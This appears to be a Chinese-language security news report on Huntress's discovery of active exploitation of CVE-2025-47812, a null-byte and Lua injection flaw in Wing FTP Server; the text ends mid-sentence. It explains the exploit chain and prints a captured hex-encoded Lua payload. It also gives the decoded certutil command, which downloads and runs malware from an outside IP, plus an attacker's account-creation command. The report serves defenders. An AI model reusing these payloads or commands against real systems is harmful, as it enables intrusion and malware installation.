2025年7月1日，Huntress在Wing FTP Server中发现了一个严重的远程代码执行（RCE）漏洞的积极利用，仅在该漏洞公开披露后一天。该漏洞被追踪为CVE-2025-47812，结合了空字节注入和Lua代码执行的强大能力，使攻击者能够获得root或SYSTEM级别的访问权限。

该漏洞的核心在于Wing FTP在处理用户名参数时错误地处理了空字节，特别是在请求loginok.html时，该页面负责处理身份验证。Huntress解释道：

“攻击者可以在用户名参数中使用空字节后进行Lua注入，”这种处理不当会破坏字符串处理，允许注入恶意代码。

该利用链包括登录（即使是匿名登录），在用户名后追加%00空字节，注入Lua代码，然后通过访问另一个页面（如dir.html）触发反序列化。结果是通过会话操控执行任意代码。

Huntress的分析师于2025年7月1日首次发现该漏洞的利用。通过他们的遥测和EDR工具，观察到在WFTPServer.exe进程下的漏洞利用行为。证据可以在会话文件和日志条目中找到，例如日志中被截断的一行：

用户 ‘anonymous
“请注意缺失的闭合引号——这是空字节在日志文件中断开了该条目。”

但明确的证据来自被篡改的Lua会话文件。其中一个文件包含了以下有效负载：

local cmd = hx("636572747574696c202d75726c6361636865202d6620687474703a2f2f3138352e3139362e392e3232353a383038302f454f70343565574c53703547355577705f794f436951202554454d50255c6d76766569574a48782e6578652026207374617274202f42202554454d50255c6d76766569574a48782e657865")
local h = io.popen(cmd)
local r = h:read("*a")
h:close()

一旦解码，十六进制编码的二进制数据揭示了攻击者的真实意图：

certutil -urlcache -f http://185.196.9.225:8080/EOp45eWLSp5G5Uwp_yOCiQ %TEMP%\mvveiWJHx.exe & start /B %TEMP%\mvveiWJHx.exe

该命令利用certutil下载并执行恶意软件，攻击受害者主机。

此次攻击时间线既是持续性攻击的典型案例，也是业余错误的表现。Huntress观察到，至少有五个不同的攻击者在一天内针对同一脆弱系统发起攻击。像net user wingftp 123123qweqwe /add这样的命令被用来创建新用户，同时侦察活动包括：

其中一名攻击者甚至输入了c:^A.exe，不小心将SOH（开始标头）控制字符注入了命令中——这实际上导致了他们自己有效负载的失败。Huntress调侃道：

“目前还不清楚他们是如何甚至为何打出这个命令的。”

尽管攻击者犯下了滑稽的错误，威胁依然真实存在。最终，一名攻击者尝试安装ScreenConnect以保持持久访问。幸运的是，Microsoft Defender介入，标记并删除了文件，识别为Trojan:Win32/Ceprolad.A，紧接着WFTPServer.exe崩溃，最终中止了攻击。

Wing FTP Server 7.4.4之前的版本存在漏洞。如果您正在运行此软件：